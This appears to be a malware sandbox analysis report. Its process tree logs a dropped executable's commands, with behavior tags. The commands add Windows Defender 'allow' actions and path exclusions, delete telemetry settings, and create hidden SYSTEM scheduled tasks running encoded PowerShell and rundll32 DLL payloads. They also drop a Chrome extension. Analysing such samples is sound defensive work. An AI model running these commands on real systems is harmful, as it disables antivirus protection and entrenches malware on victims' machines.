C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF\laiBCMBTeUBwuMJ\vZcNxOl.exeC:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF\laiBCMBTeUBwuMJ\vZcNxOl.exe np /oxsite_idkma 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1440
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1716
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ClDztWYwqujU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ClDztWYwqujU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WncRsuDbmbPeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WncRsuDbmbPeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sIeOoMJfZQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sIeOoMJfZQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ugoHhkvuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ugoHhkvuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MryGuBjttswgWzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MryGuBjttswgWzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TeLTBhMxzeEQhphV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TeLTBhMxzeEQhphV\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ClDztWYwqujU2" /t REG_DWORD /d 0 /reg:323⤵PID:4944
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ClDztWYwqujU2" /t REG_DWORD /d 0 /reg:324⤵PID:3564
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ClDztWYwqujU2" /t REG_DWORD /d 0 /reg:643⤵PID:2812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WncRsuDbmbPeC" /t REG_DWORD /d 0 /reg:323⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WncRsuDbmbPeC" /t REG_DWORD /d 0 /reg:643⤵PID:304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR" /t REG_DWORD /d 0 /reg:323⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR" /t REG_DWORD /d 0 /reg:643⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sIeOoMJfZQUn" /t REG_DWORD /d 0 /reg:323⤵PID:4188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sIeOoMJfZQUn" /t REG_DWORD /d 0 /reg:643⤵PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ugoHhkvuU" /t REG_DWORD /d 0 /reg:323⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ugoHhkvuU" /t REG_DWORD /d 0 /reg:643⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MryGuBjttswgWzVB /t REG_DWORD /d 0 /reg:323⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MryGuBjttswgWzVB /t REG_DWORD /d 0 /reg:643⤵PID:2808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF /t REG_DWORD /d 0 /reg:323⤵PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF /t REG_DWORD /d 0 /reg:643⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TeLTBhMxzeEQhphV /t REG_DWORD /d 0 /reg:323⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TeLTBhMxzeEQhphV /t REG_DWORD /d 0 /reg:643⤵PID:916
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFRIsIAJP" /SC once /ST 02:49:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFRIsIAJP"2⤵PID:2664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFRIsIAJP"2⤵PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EpRCoSCBjpSgFDjnu" /SC once /ST 01:53:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TeLTBhMxzeEQhphV\VimPEpmyuGUhbrH\WUmcOyK.exe\" dQ /vqsite_idOtq 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EpRCoSCBjpSgFDjnu"2⤵PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:308
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5012
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1440
-
C:\Windows\Temp\TeLTBhMxzeEQhphV\VimPEpmyuGUhbrH\WUmcOyK.exeC:\Windows\Temp\TeLTBhMxzeEQhphV\VimPEpmyuGUhbrH\WUmcOyK.exe dQ /vqsite_idOtq 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcBhLullztQfmhiPXd"2⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4196
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4168
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ugoHhkvuU\oqMMND.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UNRLnkjTyboRSZM" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UNRLnkjTyboRSZM2" /F /xml "C:\Program Files (x86)\ugoHhkvuU\LUqbSSd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UNRLnkjTyboRSZM"2⤵PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UNRLnkjTyboRSZM"2⤵PID:1900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WQKDhrfQOTzJkU" /F /xml "C:\Program Files (x86)\ClDztWYwqujU2\hAybsEN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wgWtYiMthhkZl2" /F /xml "C:\ProgramData\MryGuBjttswgWzVB\ioohsjI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LNIbEqePKqtVhJLxP2" /F /xml "C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR\SLusLMk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zYnvWxSBAtHpavlHPym2" /F /xml "C:\Program Files (x86)\WncRsuDbmbPeC\IBZKuhh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JtsNICArfjZPvKOaU" /SC once /ST 11:57:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TeLTBhMxzeEQhphV\mZjPHUUC\ZkgBTWF.dll\",#1 /iGsite_idhVT 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JtsNICArfjZPvKOaU"2⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:868
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2824
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1468
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EpRCoSCBjpSgFDjnu"2⤵PID:372
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\TeLTBhMxzeEQhphV\mZjPHUUC\ZkgBTWF.dll",#1 /iGsite_idhVT 3851181⤵PID:2360
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\TeLTBhMxzeEQhphV\mZjPHUUC\ZkgBTWF.dll",#1 /iGsite_idhVT 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JtsNICArfjZPvKOaU"3⤵PID:5092
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
